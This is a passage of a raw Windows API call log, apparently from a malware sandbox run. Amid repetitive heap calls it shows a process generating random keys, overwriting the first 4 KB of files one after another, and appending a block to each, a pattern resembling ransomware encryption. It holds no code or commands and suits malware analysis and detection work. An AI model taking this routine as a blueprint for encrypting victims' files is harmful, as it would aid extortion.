dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.733] GetProcessHeap () returned 0x4f10000 [0080.733] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.733] GetProcessHeap () returned 0x4f10000 [0080.733] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.733] GetProcessHeap () returned 0x4f10000 [0080.733] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.733] GetProcessHeap () returned 0x4f10000 [0080.733] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.733] GetProcessHeap () returned 0x4f10000 [0080.733] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.733] GetProcessHeap () returned 0x4f10000 [0080.733] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.733] GetProcessHeap () returned 0x4f10000 [0080.733] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.733] GetProcessHeap () returned 0x4f10000 [0080.733] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.733] GetProcessHeap () returned 0x4f10000 [0080.733] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.733] GetProcessHeap () returned 0x4f10000 [0080.733] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.733] GetProcessHeap () returned 0x4f10000 [0080.733] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.733] GetProcessHeap () returned 0x4f10000 [0080.733] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.733] GetProcessHeap () returned 0x4f10000 [0080.733] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.733] GetProcessHeap () returned 0x4f10000 [0080.733] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.733] GetProcessHeap () returned 0x4f10000 [0080.733] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.733] GetProcessHeap () returned 0x4f10000 [0080.733] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.733] GetProcessHeap () returned 0x4f10000 [0080.733] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0080.734] GetProcessHeap () returned 0x4f10000 [0080.734] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.734] GetProcessHeap () returned 0x4f10000 [0080.734] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0080.734] GetProcessHeap () returned 0x4f10000 [0080.734] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0080.734] GetProcessHeap () returned 0x4f10000 [0080.734] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0080.734] GetProcessHeap () returned 0x4f10000 [0080.734] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0080.734] GetProcessHeap () returned 0x4f10000 [0080.734] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0080.734] GetProcessHeap () returned 0x4f10000 [0080.734] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0080.734] GetProcessHeap () returned 0x4f10000 [0080.734] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.734] GetProcessHeap () returned 0x4f10000 [0080.734] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0080.734] GetProcessHeap () returned 0x4f10000 [0080.734] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.734] GetProcessHeap () returned 0x4f10000 [0080.734] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.734] GetProcessHeap () returned 0x4f10000 [0080.734] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.734] GetProcessHeap () returned 0x4f10000 [0080.734] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.734] GetProcessHeap () returned 0x4f10000 [0080.734] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.734] GetProcessHeap () returned 0x4f10000 [0080.734] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.734] GetProcessHeap () returned 0x4f10000 [0080.734] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.735] GetProcessHeap () returned 0x4f10000 [0080.735] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.735] GetProcessHeap () returned 0x4f10000 [0080.735] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.735] GetProcessHeap () returned 0x4f10000 [0080.735] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.735] GetProcessHeap () returned 0x4f10000 [0080.735] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.735] GetProcessHeap () returned 0x4f10000 [0080.735] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.735] GetProcessHeap () returned 0x4f10000 [0080.735] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.735] GetProcessHeap () returned 0x4f10000 [0080.735] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.735] GetProcessHeap () returned 0x4f10000 [0080.735] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.735] GetProcessHeap () returned 0x4f10000 [0080.735] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.735] GetProcessHeap () returned 0x4f10000 [0080.735] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.735] GetProcessHeap () returned 0x4f10000 [0080.735] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.735] GetProcessHeap () returned 0x4f10000 [0080.735] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.735] GetProcessHeap () returned 0x4f10000 [0080.735] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.735] GetProcessHeap () returned 0x4f10000 [0080.736] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.736] GetProcessHeap () returned 0x4f10000 [0080.736] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.736] GetProcessHeap () returned 0x4f10000 [0080.736] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.736] GetProcessHeap () returned 0x4f10000 [0080.736] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.736] GetProcessHeap () returned 0x4f10000 [0080.736] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0080.736] GetProcessHeap () returned 0x4f10000 [0080.736] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.736] GetProcessHeap () returned 0x4f10000 [0080.736] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0080.736] GetProcessHeap () returned 0x4f10000 [0080.736] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0080.736] GetProcessHeap () returned 0x4f10000 [0080.736] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0080.736] GetProcessHeap () returned 0x4f10000 [0080.736] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0080.736] SetFilePointerEx (in: hFile=0x86c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.736] WriteFile (in: hFile=0x86c, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0080.736] WriteFile (in: hFile=0x86c, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0080.736] GetProcessHeap () returned 0x4f10000 [0080.736] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0080.736] GetProcessHeap () returned 0x4f10000 [0080.736] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0080.736] GetProcessHeap () returned 0x4f10000 [0080.737] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0080.737] CloseHandle (hObject=0x86c) returned 1 [0080.738] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 60 [0080.738] SetFilePointerEx (in: hFile=0x870, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.738] ReadFile (in: hFile=0x870, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0080.738] SetFilePointerEx (in: hFile=0x870, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.738] GetProcessHeap () returned 0x4f10000 [0080.738] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0080.738] GetProcessHeap () returned 0x4f10000 [0080.738] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0080.738] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0080.738] GetProcessHeap () returned 0x4f10000 [0080.738] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0080.738] ReadFile (in: hFile=0x870, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0080.786] SetFilePointerEx (in: hFile=0x870, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.786] WriteFile (in: hFile=0x870, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0080.786] GetProcessHeap () returned 0x4f10000 [0080.786] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0080.786] GetProcessHeap () returned 0x4f10000 [0080.786] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0080.786] GetProcessHeap () returned 0x4f10000 [0080.786] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0080.786] GetProcessHeap () returned 0x4f10000 [0080.786] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0080.786] GetProcessHeap () returned 0x4f10000 [0080.786] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0080.786] GetProcessHeap () returned 0x4f10000 [0080.786] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0080.786] GetProcessHeap () returned 0x4f10000 [0080.786] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.786] GetProcessHeap () returned 0x4f10000 [0080.786] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.786] GetProcessHeap () returned 0x4f10000 [0080.786] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.786] GetProcessHeap () returned 0x4f10000 [0080.786] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.787] GetProcessHeap () returned 0x4f10000 [0080.787] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.787] GetProcessHeap () returned 0x4f10000 [0080.787] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.787] GetProcessHeap () returned 0x4f10000 [0080.787] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.787] GetProcessHeap () returned 0x4f10000 [0080.787] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.787] GetProcessHeap () returned 0x4f10000 [0080.787] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.787] GetProcessHeap () returned 0x4f10000 [0080.787] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.787] GetProcessHeap () returned 0x4f10000 [0080.787] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.787] GetProcessHeap () returned 0x4f10000 [0080.787] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.787] GetProcessHeap () returned 0x4f10000 [0080.787] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.787] GetProcessHeap () returned 0x4f10000 [0080.787] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.787] GetProcessHeap () returned 0x4f10000 [0080.787] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.787] GetProcessHeap () returned 0x4f10000 [0080.787] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.787] GetProcessHeap () returned 0x4f10000 [0080.787] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.787] GetProcessHeap () returned 0x4f10000 [0080.787] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.787] GetProcessHeap () returned 0x4f10000 [0080.787] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.787] GetProcessHeap () returned 0x4f10000 [0080.787] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.787] GetProcessHeap () returned 0x4f10000 [0080.787] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.787] GetProcessHeap () returned 0x4f10000 [0080.787] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.787] GetProcessHeap () returned 0x4f10000 [0080.787] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.788] GetProcessHeap () returned 0x4f10000 [0080.788] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.788] GetProcessHeap () returned 0x4f10000 [0080.788] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.788] GetProcessHeap () returned 0x4f10000 [0080.788] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.788] GetProcessHeap () returned 0x4f10000 [0080.788] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.788] GetProcessHeap () returned 0x4f10000 [0080.788] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.788] GetProcessHeap () returned 0x4f10000 [0080.788] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.788] GetProcessHeap () returned 0x4f10000 [0080.788] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.788] GetProcessHeap () returned 0x4f10000 [0080.788] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.788] GetProcessHeap () returned 0x4f10000 [0080.788] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.788] GetProcessHeap () returned 0x4f10000 [0080.788] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0080.788] GetProcessHeap () returned 0x4f10000 [0080.788] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.788] GetProcessHeap () returned 0x4f10000 [0080.788] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0080.788] GetProcessHeap () returned 0x4f10000 [0080.788] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0080.788] GetProcessHeap () returned 0x4f10000 [0080.788] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0080.788] GetProcessHeap () returned 0x4f10000 [0080.788] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0080.788] GetProcessHeap () returned 0x4f10000 [0080.788] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0080.788] GetProcessHeap () returned 0x4f10000 [0080.788] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0080.788] GetProcessHeap () returned 0x4f10000 [0080.788] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.788] GetProcessHeap () returned 0x4f10000 [0080.788] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0080.789] GetProcessHeap () returned 0x4f10000 [0080.789] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.789] GetProcessHeap () returned 0x4f10000 [0080.789] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.789] GetProcessHeap () returned 0x4f10000 [0080.789] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.789] GetProcessHeap () returned 0x4f10000 [0080.789] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.789] GetProcessHeap () returned 0x4f10000 [0080.789] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.789] GetProcessHeap () returned 0x4f10000 [0080.789] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.789] GetProcessHeap () returned 0x4f10000 [0080.789] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.789] GetProcessHeap () returned 0x4f10000 [0080.789] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.789] GetProcessHeap () returned 0x4f10000 [0080.789] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.789] GetProcessHeap () returned 0x4f10000 [0080.789] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.789] GetProcessHeap () returned 0x4f10000 [0080.789] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.789] GetProcessHeap () returned 0x4f10000 [0080.789] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.789] GetProcessHeap () returned 0x4f10000 [0080.789] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.789] GetProcessHeap () returned 0x4f10000 [0080.789] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.790] GetProcessHeap () returned 0x4f10000 [0080.790] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.790] GetProcessHeap () returned 0x4f10000 [0080.790] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.790] GetProcessHeap () returned 0x4f10000 [0080.790] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.790] GetProcessHeap () returned 0x4f10000 [0080.790] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.790] GetProcessHeap () returned 0x4f10000 [0080.790] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.790] GetProcessHeap () returned 0x4f10000 [0080.790] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.790] GetProcessHeap () returned 0x4f10000 [0080.790] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.790] GetProcessHeap () returned 0x4f10000 [0080.790] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.790] GetProcessHeap () returned 0x4f10000 [0080.790] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.790] GetProcessHeap () returned 0x4f10000 [0080.790] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.790] GetProcessHeap () returned 0x4f10000 [0080.790] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0080.790] GetProcessHeap () returned 0x4f10000 [0080.790] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.790] GetProcessHeap () returned 0x4f10000 [0080.790] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0080.790] GetProcessHeap () returned 0x4f10000 [0080.790] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0080.790] GetProcessHeap () returned 0x4f10000 [0080.790] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0080.790] GetProcessHeap () returned 0x4f10000 [0080.791] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0080.791] SetFilePointerEx (in: hFile=0x870, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.791] WriteFile (in: hFile=0x870, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0080.791] WriteFile (in: hFile=0x870, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0080.791] GetProcessHeap () returned 0x4f10000 [0080.791] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0080.791] GetProcessHeap () returned 0x4f10000 [0080.791] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0080.791] GetProcessHeap () returned 0x4f10000 [0080.791] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0080.791] CloseHandle (hObject=0x870) returned 1 [0080.792] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 61 [0080.792] SetFilePointerEx (in: hFile=0x874, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.792] ReadFile (in: hFile=0x874, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0080.792] SetFilePointerEx (in: hFile=0x874, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.792] GetProcessHeap () returned 0x4f10000 [0080.792] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0080.792] GetProcessHeap () returned 0x4f10000 [0080.793] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0080.793] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0080.793] GetProcessHeap () returned 0x4f10000 [0080.793] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 